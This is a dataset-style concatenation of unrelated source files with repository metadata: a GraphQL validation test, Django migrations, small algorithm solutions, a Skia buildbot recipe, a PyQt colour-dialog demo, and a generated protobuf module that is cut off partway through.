"https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546498, "tag_id": "6809640369764958215", "tag_name": "Vue.js", "color": "#41B883", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/7b5c3eb591b671749fee.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432234520, "mtime": 1631693194, "id_type": 9, "tag_alias": "", "post_article_count": 31257, "concern_user_count": 313520}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631693180, "id_type": 9, "tag_alias": "", "post_article_count": 88830, "concern_user_count": 527705}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631693185, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398957}, {"id": 2546523, "tag_id": "6809640403516522504", "tag_name": "API", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/a7c8e10a9c742fc175f9.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435971240, "mtime": 1631683137, "id_type": 9, "tag_alias": "", "post_article_count": 7154, "concern_user_count": 88261}], "user_interact": {"id": 6844903518344577037, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": 
false}, "req_id": "20210915160833010212150040390020BC"}], "cursor": "eyJ2IjoiNzAwNzI1MjQ2NDcyNjQ1ODM5OSIsImkiOjEwMjYwfQ==", "count": 11060, "has_more": true} | [
"[email protected]"
] | |
8655a86f4d99e4dc3d21d0a740e200eda1cd4269 | 66643f48950453dd1cc408a763360db2be9942f6 | /tests/validation/test_executable_definitions.py | 4a21c63b65e4397cb38e995fa01b69400852109f | [
"MIT"
] | permissive | khasbilegt/graphql-core | ac958b5a68c27acd0c7f96429deeca7f7f8736b3 | fc76d01a2a134ba2cebd863bf48773fd44c2645b | refs/heads/main | 2023-08-05T06:03:56.299244 | 2021-09-19T10:31:30 | 2021-09-19T10:31:30 | 408,735,141 | 1 | 0 | MIT | 2021-09-21T08:00:36 | 2021-09-21T08:00:35 | null | UTF-8 | Python | false | false | 2,234 | py | from functools import partial
from graphql.validation import ExecutableDefinitionsRule
from .harness import assert_validation_errors
assert_errors = partial(assert_validation_errors, ExecutableDefinitionsRule)
assert_valid = partial(assert_errors, errors=[])
def describe_validate_executable_definitions():
def with_only_operation():
assert_valid(
"""
query Foo {
dog {
name
}
}
"""
)
def with_operation_and_fragment():
assert_valid(
"""
query Foo {
dog {
name
...Frag
}
}
fragment Frag on Dog {
name
}
"""
)
def with_type_definition():
assert_errors(
"""
query Foo {
dog {
name
}
}
type Cow {
name: String
}
extend type Dog {
color: String
}
""",
[
{
"message": "The 'Cow' definition is not executable.",
"locations": [(8, 13)],
},
{
"message": "The 'Dog' definition is not executable.",
"locations": [(12, 13)],
},
],
)
def with_schema_definition():
assert_errors(
"""
schema {
query: Query
}
type Query {
test: String
}
extend schema @directive
""",
[
{
"message": "The schema definition is not executable.",
"locations": [(2, 13)],
},
{
"message": "The 'Query' definition is not executable.",
"locations": [(6, 13)],
},
{
"message": "The schema definition is not executable.",
"locations": [(10, 13)],
},
],
)
| [
"[email protected]"
] | |
6d8b0b5732d62a9cf3767687b8e8763bebd74f0c | 0c154919a427bad71598bae69a8b5b6b94bc2627 | /Posts/migrations/0008_post_vote.py | 1f9c7557cad3250dbbcd9af07789b7d0075280aa | [] | no_license | MichalDrosio/blog | b7b56ffd35ef82d2a5c3c791eff8d326644f5627 | ebb7c07f29ea9de1f872bfeea79ae6d0c4822766 | refs/heads/master | 2020-12-22T13:02:54.573249 | 2020-07-27T11:25:16 | 2020-07-27T11:25:16 | 236,775,255 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | # Generated by Django 3.0.8 on 2020-07-24 10:07
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a ``vote`` counter field to the ``Posts.Post`` model."""

    # Must be applied after the previous Posts migration.
    dependencies = [
        ('Posts', '0007_auto_20200723_1357'),
    ]
    operations = [
        migrations.AddField(
            model_name='post',
            name='vote',
            # Non-negative counter; existing rows start with zero votes.
            field=models.PositiveIntegerField(default=0),
        ),
    ]
| [
"[email protected]"
] | |
629bb2ace85054f0e0e1bf16e25f739810db624e | 0e834094f5e4274b279939b81caedec7d8ef2c73 | /m3/django_/mysite3/book/migrations/0003_auto_20200115_1745.py | e90a76a3af2a4b4753b0bf2a493db5ffb36cf7a9 | [] | no_license | SpringSnowB/All-file | b74eaebe1d54e1410945eaca62c70277a01ef0bf | 03485c60e7c07352aee621df94455da3d466b872 | refs/heads/master | 2020-11-27T23:54:36.984555 | 2020-01-21T08:42:21 | 2020-01-21T08:42:21 | 229,651,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,176 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2020-01-15 09:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the ``Author`` model and extend ``Book`` with price/publisher."""

    dependencies = [
        ('book', '0002_auto_20200115_1603'),
    ]
    operations = [
        migrations.CreateModel(
            name='Author',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # verbose_name '姓名' = "name".
                ('name', models.CharField(max_length=20, verbose_name='姓名')),
                # verbose_name '年龄' = "age".
                ('age', models.IntegerField(default=1, verbose_name='年龄')),
                # verbose_name '邮箱' = "email"; nullable.
                ('email', models.EmailField(max_length=254, null=True, verbose_name='邮箱')),
            ],
        ),
        migrations.AddField(
            model_name='book',
            name='market_price',
            # verbose_name '图书零售价' = "retail price"; up to 99999.99.
            field=models.DecimalField(decimal_places=2, default=0, max_digits=7, verbose_name='图书零售价'),
        ),
        migrations.AddField(
            model_name='book',
            name='pub',
            # verbose_name '出版社' = "publisher"; defaults to empty string.
            field=models.CharField(default='', max_length=30, verbose_name='出版社'),
        ),
    ]
| [
"[email protected]"
] | |
6267d925f4ba5879b734a6dcba1640ccedeb8b48 | a2eaa3decc385dea227da8a99203f767f32cf941 | /electronic_station/ascending_list.py | 98a5261f1acf37986d291eb1cd62bca1a61480d4 | [] | no_license | vlad-bezden/py.checkio | 94db32111eeeb2cd90c7b3c4606ea72cf2bb6678 | 6cd870ca3056cc9dcdce0ad520c27e92311719b3 | refs/heads/master | 2021-07-01T18:39:35.955671 | 2020-10-05T00:56:38 | 2020-10-05T00:56:38 | 93,111,389 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,075 | py | """Ascending List
https://py.checkio.org/en/mission/ascending-list/
Determine whether the sequence of elements items is ascending so that its
each element is strictly larger than (and not merely equal to) the
element that precedes it.
Input: Iterable with ints.
Output: bool
Output:
is_ascending_all([-5, 10, 99, 123456]). Exec time = 0.000124
is_ascending_set([-5, 10, 99, 123456]). Exec time = 0.000084
is_ascending_all([99]). Exec time = 0.000082
is_ascending_set([99]). Exec time = 0.000057
is_ascending_all([4, 5, 6, 7, 3, 7, 9]). Exec time = 0.000142
is_ascending_set([4, 5, 6, 7, 3, 7, 9]). Exec time = 0.000081
is_ascending_all([]). Exec time = 0.000090
is_ascending_set([]). Exec time = 0.000047
is_ascending_all([1, 1, 1, 1]). Exec time = 0.000103
is_ascending_set([1, 1, 1, 1]). Exec time = 0.000061
Conclusion: using set works faster than iterating using zip
"""
from typing import Callable, Sequence
from timeit import repeat
from dataclasses import dataclass
@dataclass
class Test:
    """One validation case: an input sequence and its expected verdict."""

    data: Sequence[int]
    expected: bool
TESTS = [
Test([-5, 10, 99, 123456], True),
Test([99], True),
Test([4, 5, 6, 7, 3, 7, 9], False),
Test([], True),
Test([1, 1, 1, 1], False),
]
def is_ascending_set(items: Sequence[int]) -> bool:
    """Return True when *items* is strictly ascending.

    A sequence is strictly ascending exactly when deduplicating it loses
    nothing (no repeats) and sorting it changes nothing (already ordered),
    so a single comparison suffices.

    Fix/generalisation: the original compared ``sorted(...)`` (always a
    list) directly against ``items``, so any non-list sequence such as a
    tuple returned False even when ascending.  Normalising the input to a
    list first keeps list behaviour identical and makes other sequence
    types work.
    """
    as_list = list(items)
    return sorted(set(as_list)) == as_list
def is_ascending_zip(items: Sequence[int]) -> bool:
    """Return True when every element is strictly larger than its predecessor."""
    for pos in range(1, len(items)):
        # A single non-increasing adjacent pair disproves the property.
        if items[pos - 1] >= items[pos]:
            return False
    return True
def validate(funcs: Sequence[Callable[[Sequence[int]], bool]]) -> None:
    """Assert that every function in *funcs* passes every case in TESTS.

    Raises AssertionError naming the function, the case and the actual
    result on the first mismatch; prints a success banner otherwise.
    """
    for test in TESTS:
        for f in funcs:
            result = f(test.data)
            # The ``{result = }`` f-string form embeds the variable name too.
            assert result == test.expected, f"{f.__name__}({test}), {result = }"
    print("PASSED!!!\n")
if __name__ == "__main__":
    funcs = [is_ascending_zip, is_ascending_set]
    # First prove both implementations correct, then micro-benchmark each
    # one on every test input (best of 5 repeats of 100 calls).
    validate(funcs)
    for test in TESTS:
        for f in funcs:
            t = repeat(stmt=f"f({test.data})", repeat=5, number=100, globals=globals())
            print(f"{f.__name__}({test.data}). Exec time = {min(t):.6f}")
        print()
| [
"[email protected]"
] | |
b03c20c06b007718fdc3396885410fb6db0e19f2 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /hQRuQguN4bKyM2gik_21.py | d59885f89bac86c7d6d3eae679f0d6dbfb33395c | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 195 | py |
def simple_check(a, b):
    """Count divisible pairs while counting both arguments down together.

    Starting from ``hi = max(a, b)`` and ``lo = min(a, b)``, both values
    are decremented in lockstep for ``lo`` steps; the result is how many
    of the visited pairs satisfy ``hi % lo == 0``.
    """
    lo, hi = sorted((a, b))
    gap = hi - lo  # constant: both values shrink by the same amount each step
    # Step k visits the pair (lo - k, lo - k + gap); writing d = lo - k,
    # the divisor d runs over lo, lo-1, ..., 1.
    return sum(1 for d in range(lo, 0, -1) if (d + gap) % d == 0)
| [
"[email protected]"
] | |
021e27b295aa1e58939d5d8842368e01465b03e1 | 746cd1d11eb24e7a987f2dd4db72b68a8e0a5b99 | /android/external/adt-infra/build/scripts/slave/recipes/skia/skia.py | c27eafe8ca462660a9cd4d803724a7fb4193b04d | [] | no_license | binsys/BPI-A64-Android7 | c49b0d3a785811b7f0376c92100c6ac102bb858c | 751fadaacec8493a10461661d80fce4b775dd5de | refs/heads/master | 2023-05-11T18:31:41.505222 | 2020-07-13T04:27:40 | 2020-07-13T12:08:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,098 | py | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Recipe module for Skia builders.
DEPS = [
'json',
'path',
'platform',
'properties',
'raw_io',
'skia',
]
TEST_BUILDERS = {
'client.skia': {
'skiabot-ipad4-000': [
'Test-iOS-Clang-iPad4-GPU-SGX554-Arm7-Debug',
],
'skiabot-linux-tester-000': [
'Test-Ubuntu-GCC-GCE-CPU-AVX2-x86_64-Debug',
'Test-Ubuntu-GCC-GCE-CPU-AVX2-x86_64-Release-TSAN',
'Test-Ubuntu-Clang-GCE-CPU-AVX2-x86_64-Coverage-Trybot',
],
'skiabot-shuttle-ubuntu12-003': [
'Test-ChromeOS-GCC-Link-CPU-AVX-x86_64-Debug',
],
'skiabot-shuttle-ubuntu12-gtx550ti-001': [
'Test-Ubuntu-GCC-ShuttleA-GPU-GTX550Ti-x86_64-Release-Valgrind',
'Test-Ubuntu-GCC-ShuttleA-GPU-GTX550Ti-x86_64-Debug-ZeroGPUCache',
],
'skiabot-shuttle-win8-i7-4790k-001': [
'Perf-Win8-MSVC-ShuttleB-GPU-HD4600-x86_64-Release-Trybot',
],
},
'client.skia.android': {
'skiabot-shuttle-ubuntu12-nexus7-001': [
'Perf-Android-GCC-Nexus7-GPU-Tegra3-Arm7-Release',
'Test-Android-GCC-Nexus7-GPU-Tegra3-Arm7-Debug',
],
},
'client.skia.compile': {
'skiabot-mac-10_8-compile-001': [
'Build-Mac10.8-Clang-Arm7-Debug-Android',
],
'skiabot-linux-compile-000': [
'Build-Ubuntu-GCC-Arm7-Debug-Android',
'Build-Ubuntu-GCC-x86_64-Release-CMake',
],
},
'client.skia.fyi': {
'skiabot-linux-housekeeper-003': [
'Housekeeper-PerCommit',
'Housekeeper-PerCommit-Trybot',
'Perf-Android-GCC-Nexus5-CPU-NEON-Arm7-Release-Appurify',
'Perf-Android-GCC-Nexus5-GPU-Adreno330-Arm7-Release-Appurify',
],
},
}
def RunSteps(api):
  # Recipe entry point: all real step generation lives in the shared
  # skia recipe module.
  api.skia.gen_steps()
def GenTests(api):
def AndroidTestData(builder):
test_data = (
api.step_data(
'get EXTERNAL_STORAGE dir',
stdout=api.raw_io.output('/storage/emulated/legacy')) +
api.step_data(
'read SKP_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data(
'read SKIMAGE_VERSION',
stdout=api.raw_io.output('42'))
)
if 'Test' in builder:
test_data += (
api.step_data(
'exists skia_dm',
stdout=api.raw_io.output(''))
)
if 'Perf' in builder:
test_data += api.step_data(
'exists skia_perf',
stdout=api.raw_io.output(''))
return test_data
for mastername, slaves in TEST_BUILDERS.iteritems():
for slavename, builders_by_slave in slaves.iteritems():
for builder in builders_by_slave:
test = (
api.test(builder) +
api.properties(buildername=builder,
mastername=mastername,
slavename=slavename,
buildnumber=5,
revision='abc123') +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
if 'Test' in builder or 'Perf' in builder:
test += api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42'))
if 'Android' in builder:
ccache = '/usr/bin/ccache' if 'Appurify' in builder else None
test += api.step_data('has ccache?',
stdout=api.json.output({'ccache':ccache}))
if ('Android' in builder and
('Test' in builder or 'Perf' in builder) and
not 'Appurify' in builder):
test += AndroidTestData(builder)
if 'ChromeOS' in builder:
test += api.step_data('read SKP_VERSION',
stdout=api.raw_io.output('42'))
test += api.step_data('read SKIMAGE_VERSION',
stdout=api.raw_io.output('42'))
if 'Trybot' in builder:
test += api.properties(issue=500,
patchset=1,
rietveld='https://codereview.chromium.org')
if 'Win' in builder:
test += api.platform('win', 64)
yield test
builder = 'Test-Ubuntu-GCC-GCE-CPU-AVX2-x86_64-Debug'
yield (
api.test('failed_dm') +
api.properties(buildername=builder,
mastername='client.skia',
slavename='skiabot-linux-tester-000',
buildnumber=6) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('dm', retcode=1)
)
yield (
api.test('has_ccache_android') +
api.properties(buildername='Build-Ubuntu-GCC-Arm7-Debug-Android',
mastername='client.skia.compile',
slavename='skiabot-linux-compile-000') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':'/usr/bin/ccache'}))
)
builder = 'Test-Android-GCC-Nexus7-GPU-Tegra3-Arm7-Debug'
master = 'client.skia.android'
slave = 'skiabot-shuttle-ubuntu12-nexus7-001'
yield (
api.test('failed_get_hashes') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':None})) +
AndroidTestData(builder) +
api.step_data('read SKP_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('read SKIMAGE_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data('get uninteresting hashes', retcode=1) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
yield (
api.test('download_and_push_skps') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123',
test_downloaded_skp_version='2') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':None})) +
AndroidTestData(builder) +
api.step_data('read SKP_VERSION',
stdout=api.raw_io.output('2')) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('read SKIMAGE_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data(
'exists skps',
stdout=api.raw_io.output('')) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
yield (
api.test('missing_SKP_VERSION_device') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':None})) +
AndroidTestData(builder) +
api.step_data('read SKP_VERSION',
retcode=1) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('read SKIMAGE_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data(
'exists skps',
stdout=api.raw_io.output('')) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
yield (
api.test('download_and_push_skimage') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123',
test_downloaded_skimage_version='2') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':None})) +
AndroidTestData(builder) +
api.step_data('read SKP_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('read SKIMAGE_VERSION',
stdout=api.raw_io.output('2')) +
api.step_data(
'exists skia_images',
stdout=api.raw_io.output('')) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
yield (
api.test('missing_SKIMAGE_VERSION_device') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123') +
api.step_data(
'has ccache?',
stdout=api.json.output({'ccache':None})) +
AndroidTestData(builder) +
api.step_data('read SKP_VERSION',
stdout=api.raw_io.output('42')) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('read SKIMAGE_VERSION',
retcode=1) +
api.step_data(
'exists skia_images',
stdout=api.raw_io.output('')) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
builder = 'Test-Ubuntu-GCC-GCE-CPU-AVX2-x86_64-Debug'
master = 'client.skia'
slave = 'skiabot-linux-test-000'
yield (
api.test('missing_SKP_VERSION_host') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123') +
api.step_data('Get downloaded SKP_VERSION', retcode=1) +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
yield (
api.test('missing_SKIMAGE_VERSION_host') +
api.properties(buildername=builder,
mastername=master,
slavename=slave,
buildnumber=6,
revision='abc123') +
api.step_data('gsutil cat TIMESTAMP_LAST_UPLOAD_COMPLETED',
stdout=api.raw_io.output('42')) +
api.step_data('Get downloaded SKIMAGE_VERSION', retcode=1) +
api.path.exists(
api.path['slave_build'].join('skia'),
api.path['slave_build'].join('tmp', 'uninteresting_hashes.txt')
)
)
| [
"[email protected]"
] | |
3fc2dbb3e16a2861f18b339ee15022a85d67550f | 6b7bdeff133c37245698e450a01f75bb6a97c2a4 | /28.colordialog.py | 4a47f37fbfa2e3611337d803621896fb32a462cf | [] | no_license | HardPlant/PyQT | 9bb4f8e53417ede638bddd63571ade506785d2fb | fae0315620b3005ead451a170214c1334bac7fab | refs/heads/master | 2020-03-24T23:49:47.248763 | 2018-08-05T07:59:17 | 2018-08-05T07:59:17 | 143,155,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,104 | py | from PyQt5.QtWidgets import (QWidget, QPushButton, QFrame,
QColorDialog, QApplication)
from PyQt5.QtGui import QColor
import sys
class Example(QWidget):
    """Demo widget: a button opens QColorDialog and a frame previews the pick."""

    def __init__(self):
        super().__init__()
        self.initUI()

    def initUI(self):
        # Initial preview colour: black.
        col = QColor(0, 0, 0)
        self.btn = QPushButton('Dialog', self)
        self.btn.move(20, 20)
        self.btn.clicked.connect(self.showDialog)
        # Frame whose background displays the currently selected colour.
        self.frm = QFrame(self)
        self.frm.setStyleSheet("QWidget { background-color: %s }"
                               % col.name())
        self.frm.setGeometry(130, 22, 100, 100)
        self.setGeometry(300, 300, 250, 180)
        self.setWindowTitle('Color dialog')
        self.show()

    def showDialog(self):
        # Modal colour picker; isValid() is False when the user cancels.
        col = QColorDialog.getColor()
        if col.isValid():
            self.frm.setStyleSheet("QWidget { background-color: %s }"
                                   % col.name())
if __name__ == '__main__':
    # Standard Qt bootstrap: create the application, instantiate the
    # widget, then hand control to the event loop until the window closes.
    app = QApplication(sys.argv)
    ex = Example()
    sys.exit(app.exec_())
"[email protected]"
] | |
c9f7d93330c888d19c537cb39e06fdd586f5682a | 3411ad233c411c06765f4b07f8670c12025178b6 | /LCOF/31-40/32-1/32-1.py | 478ca7b4eff8a95655fa61b25fb586420bfccdd7 | [
"MIT"
] | permissive | xuychen/Leetcode | 7d9d31fed898ce58440f5ae6665d2ccaf1a4b256 | c8bf33af30569177c5276ffcd72a8d93ba4c402a | refs/heads/master | 2021-11-19T20:39:43.741589 | 2021-10-24T16:26:52 | 2021-10-24T16:26:52 | 140,212,398 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 712 | py | import Queue
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def levelOrder(self, root):
        """Return the values of a binary tree in level (BFS) order.

        Fix: the original used the Python-2-only ``Queue`` module (a
        NameError under Python 3), and a thread-safe synchronized queue
        is unnecessary for a single-threaded traversal.  The visit list
        itself now doubles as the FIFO queue via an index cursor, which
        is O(n) with no extra imports.

        :type root: TreeNode
        :rtype: List[int]
        """
        if not root:
            return []
        # ``nodes`` is both the BFS queue and the visit order; ``i`` is
        # the cursor of the next node to expand (avoids O(n) pop(0)).
        nodes = [root]
        i = 0
        while i < len(nodes):
            node = nodes[i]
            i += 1
            if node.left:
                nodes.append(node.left)
            if node.right:
                nodes.append(node.right)
        return [node.val for node in nodes]
| [
"[email protected]"
] | |
4e1cd719cfa46c689fd0b63ee03bf2f1c80310ca | 75a179e8ddba54442697de87a3846f1711a30bae | /crudoperation/crudoperation/wsgi.py | 5d9ef489b1f5198e5c28ae26457fc488c0ac661e | [] | no_license | amanlalwani007/drftutorial | 2b5a5338b3146b1feb88c4d815fbf996dd49cb9d | 4f5c651f4dee98a359b7a6e34d0ae9a8f8630e68 | refs/heads/master | 2023-07-09T01:28:04.921042 | 2021-08-21T10:59:06 | 2021-08-21T10:59:06 | 392,457,445 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | """
WSGI config for crudoperation project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before building the app object
# (setdefault keeps any value already set in the environment).
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'crudoperation.settings')
# Module-level WSGI callable that servers (gunicorn, mod_wsgi, ...) import.
application = get_wsgi_application()
| [
"[email protected]"
] | |
3cdf409b425746438571d689e6c72da67e98299d | bc441bb06b8948288f110af63feda4e798f30225 | /idcmanager_sdk/model/easy_command/task_spec_pb2.py | ec6575adc9e75b93acae8423644206c9fe3269cc | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 9,559 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: task_spec.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from idcmanager_sdk.model.easy_command import action_pb2 as idcmanager__sdk_dot_model_dot_easy__command_dot_action__pb2
from idcmanager_sdk.model.easy_command import target_pb2 as idcmanager__sdk_dot_model_dot_easy__command_dot_target__pb2
from idcmanager_sdk.model.easy_command import task_callback_pb2 as idcmanager__sdk_dot_model_dot_easy__command_dot_task__callback__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='task_spec.proto',
package='easy_command',
syntax='proto3',
serialized_options=_b('ZFgo.easyops.local/contracts/protorepo-models/easyops/model/easy_command'),
serialized_pb=_b('\n\x0ftask_spec.proto\x12\x0c\x65\x61sy_command\x1a.idcmanager_sdk/model/easy_command/action.proto\x1a.idcmanager_sdk/model/easy_command/target.proto\x1a\x35idcmanager_sdk/model/easy_command/task_callback.proto\"\xef\x02\n\x08TaskSpec\x12\x0e\n\x06taskId\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0c\n\x04type\x18\x03 \x01(\t\x12\x11\n\toperation\x18\x04 \x01(\t\x12\x0f\n\x07groupId\x18\x05 \x01(\t\x12%\n\x07\x61\x63tions\x18\x06 \x03(\x0b\x32\x14.easy_command.Action\x12%\n\x07targets\x18\x07 \x03(\x0b\x32\x14.easy_command.Target\x12\r\n\x05\x61ppId\x18\x08 \x01(\t\x12\x11\n\tclusterId\x18\t \x01(\t\x12\x11\n\tpackageId\x18\n \x01(\t\x12\x11\n\tversionId\x18\x0b \x01(\t\x12\x12\n\nneedNotify\x18\x0c \x01(\x08\x12,\n\x08\x63\x61llback\x18\r \x01(\x0b\x32\x1a.easy_command.TaskCallback\x12\x10\n\x08\x62\x61tchNum\x18\x0e \x01(\x05\x12\x15\n\rbatchInterval\x18\x0f \x01(\x05\x12\x12\n\nfailedStop\x18\x10 \x01(\x08\x42HZFgo.easyops.local/contracts/protorepo-models/easyops/model/easy_commandb\x06proto3')
,
dependencies=[idcmanager__sdk_dot_model_dot_easy__command_dot_action__pb2.DESCRIPTOR,idcmanager__sdk_dot_model_dot_easy__command_dot_target__pb2.DESCRIPTOR,idcmanager__sdk_dot_model_dot_easy__command_dot_task__callback__pb2.DESCRIPTOR,])
_TASKSPEC = _descriptor.Descriptor(
name='TaskSpec',
full_name='easy_command.TaskSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='taskId', full_name='easy_command.TaskSpec.taskId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='easy_command.TaskSpec.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='type', full_name='easy_command.TaskSpec.type', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='operation', full_name='easy_command.TaskSpec.operation', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='groupId', full_name='easy_command.TaskSpec.groupId', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='actions', full_name='easy_command.TaskSpec.actions', index=5,
number=6, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
